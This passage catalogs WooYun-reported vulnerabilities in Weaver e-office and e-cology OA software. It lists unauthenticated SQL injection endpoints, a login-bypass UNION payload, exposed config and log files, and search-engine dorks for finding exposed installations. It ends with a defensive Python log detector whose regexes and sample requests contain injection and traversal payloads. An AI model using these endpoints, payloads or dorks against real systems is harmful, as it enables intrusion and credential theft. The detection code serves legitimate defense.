/eoffice/api/email.class.php  // emailid
(2)
/E-mobile/source_page.php  // emailid
(3)
/E-mobile/emailreply_page.php  // emailid
(4)
/E-mobile/email_page.php  // emailid

 

 

Defect ID: wooyun-2014-087500
Title: Weaver Eoffice direct getshell without login
/mysql_config.ini

 


Defect ID: wooyun-2014-082627
Title: a Weaver system's generic SQL injections, bundled (all versions)
(1)
/homepage/Homepage.jsp  // hpid
(2)
/page/element/7/News.jsp  // eid
(3)
/CRM/data/ViewCustomerBase.jsp  // requestid
(4)
/page/element/compatible/view.jsp  // eid
(5)
/page/element/Weather/View.jsp  // eid
(6)
/proj/data/ViewProject.jsp  // ProjID

 


Defect ID: wooyun-2014-078802
Title: yet another SQL injection in Weaver e-cology (no login required)
homepage/LoginHomepage.jsp  // hpid

 


Defect ID: wooyun-2014-078769
Title: SQL injection in Weaver e-cology (no login required)
/page/maint/login/Page.jsp  // templateId

 

 

Defect ID: wooyun-2014-076547
Title: vulnerability collection for a Weaver system ("a white hat who doesn't get a shell isn't a proper white hat")
// login required
Vulnerable module: My mail -> Contacts -> Import -> comma-separated CSV file
Resulting file path: http://url/email/csv/<uploaded file name>.jsp

 


Defect ID: wooyun-2014-072571
Title: Weaver eteams_oa allows modifying any user's information without authorization
// login required

 

Defect ID: wooyun-2014-055521
Title: Weaver E-office OA management system, SQL injection allows logging in as any real user without a password
POST request to general/index.php,
smsid = 1 union select '1','1','admin','1','1','1','1','1','1','1','1','1','1','1',  both values are 3DES-encrypted and then base64-encoded

 


Defect ID: wooyun-2013-034523
Title: Weaver E-office OA management system SQL injection allows dumping the database
/general/file_folder/file_new/neworedit/index.php  // CONTENT_ID

 

Log file accessible without authorization
/log/ecology_date.log

wooyun-2015-0125281 (no details found)
wooyun-2015-0125265 (no details found)
wooyun-2010-07497 (no details found)
wooyun-2010-034523 (no details found)

 

 

 

Google search: allintext: 用戶名: 密碼: 記住密碼. 自動登錄. E-Mobile
Baidu dork: 泛微協同商務系統
ZoomEye search: 泛微/

Fofa dork: app="泛微-協同辦公OA"
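For the defensive side of this list, the following Python is an added example (not from the original page or from Weaver): a small detector that parses web-server access logs in the common "combined" format, URL-decodes each request target (twice, to catch double encoding) and matches it against the unauthenticated endpoint families catalogued above: the BeanShell servlet, dbconfigreader.jsp, DataAction?sql=, the WorkflowCenterTreeData.jsp formids payload, codeEdit.jsp, officeserver.php traversal, the uploadify.php uploads, login_other.php, attach.php and client_converter.php. The rule names, severities and the sample log lines are constructed for this example; the paths and parameter names are the ones on the page. POST bodies (bsh.script, the base64 par value) are not in an access log, so those rules key on the request path alone.

```python
import re
from urllib.parse import unquote

# One rule per endpoint family from this page: (name, regex over "METHOD decoded-target", severity).
# Names and severities are this example's own labels.
RULES = [
    ("ecology_beanshell_rce",
     re.compile(r"/weaver/bsh\.servlet\.BshServlet", re.I), "critical"),
    ("ecology_dbconfig_leak",
     re.compile(r"/mobile/dbconfigreader\.jsp", re.I), "high"),
    ("ecology_dataaction_raw_sql",
     re.compile(r"/ServiceAction/com\.eweaver\.base\.DataAction\?.*\bsql=", re.I), "critical"),
    ("ecology_workflowtree_sqli",  # formids with a UNION or the long run of %0a%0d line breaks
     re.compile(r"/mobile/browser/WorkflowCenterTreeData\.jsp\?.*formids=.*(union\s+select|[\r\n]{8,})",
                re.I | re.S), "high"),
    ("ecology_codeedit_write",
     re.compile(r"/sysinterface/codeEdit\.jsp\?.*filename=", re.I), "critical"),
    ("ecology_unauth_file_read",
     re.compile(r"/(log/ecology_date\.log|messager/users\.data)(\?|$)", re.I), "medium"),
    ("eoffice_officeserver_traversal",
     re.compile(r"/iweboffice/officeserver\.php\?.*OPTION=(LOADFILE|LOADTEMPLATE|GETFILE|SAVEFILE|SAVETEMPLATE).*\.\./",
                re.I), "critical"),
    ("eoffice_uploadify_upload",
     re.compile(r"^POST .*/uploadify/uploadify\.php", re.I), "high"),
    ("eoffice_login_other_sqli",
     re.compile(r"/E-mobile/Data/login_other\.php\?.*diff=sync.*auth=.*(union\s+select|into\s+outfile)",
                re.I | re.S), "critical"),
    ("eoffice_attach_traversal",
     re.compile(r"/inc/attach\.php\?.*ATTACHMENT_NAME=.*\.\./", re.I), "high"),
    ("eoffice_client_converter_session",
     re.compile(r"/client_converter\.php\?.*userAccount=", re.I), "high"),
]

# Apache/nginx "combined" format: host ident user [time] "METHOD TARGET PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the request fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def normalise(method, target):
    """Decode percent-encoding twice (so %252e%252e and %0a%0d become their literal bytes)
    and collapse repeated slashes in the path, since several payloads on the page start with //."""
    decoded = unquote(unquote(target))
    path, sep, query = decoded.partition("?")
    path = re.sub(r"/{2,}", "/", path)
    return f"{method} {path}{sep}{query}"


def scan(lines):
    """Return (rule, severity, source ip, status, raw target) for every line that matches a rule."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        req = normalise(rec["method"], rec["target"])
        for name, rx, severity in RULES:
            if rx.search(req):
                hits.append((name, severity, rec["src"], rec["status"], rec["target"]))
    return hits


# Constructed sample traffic, not real log data.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Sep/2019:10:01:02 +0800] "POST /weaver/bsh.servlet.BshServlet HTTP/1.1" 200 512 "-" "python-requests/2.22.0"',
    '10.0.0.5 - - [12/Sep/2019:10:01:03 +0800] "GET /mobile/dbconfigreader.jsp HTTP/1.1" 200 1320 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/Sep/2019:10:02:00 +0800] "GET //ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER HTTP/1.1" 200 9800 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/Sep/2019:10:02:05 +0800] "GET /iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=..%2Fmysql_config.ini HTTP/1.1" 200 300 "-" "curl/7.64"',
    '10.0.0.9 - - [12/Sep/2019:10:03:00 +0800] "GET /login/Login.jsp?logintype=1 HTTP/1.1" 200 4200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Sep/2019:10:03:10 +0800] "GET /mobile/browser/WorkflowCenterTreeData.jsp?formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion%20select%20NULL,value%20from%20v$parameter HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for name, severity, src, status, target in scan(SAMPLE_LOG):
        print(f"[{severity}] {name} src={src} status={status} {target[:80]}")
```

The status code is carried along rather than filtered on: the WorkflowCenterTreeData.jsp probe in the sample returns 500 and is still worth an alert, and a 404 for BshServlet still tells you who is scanning for it.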

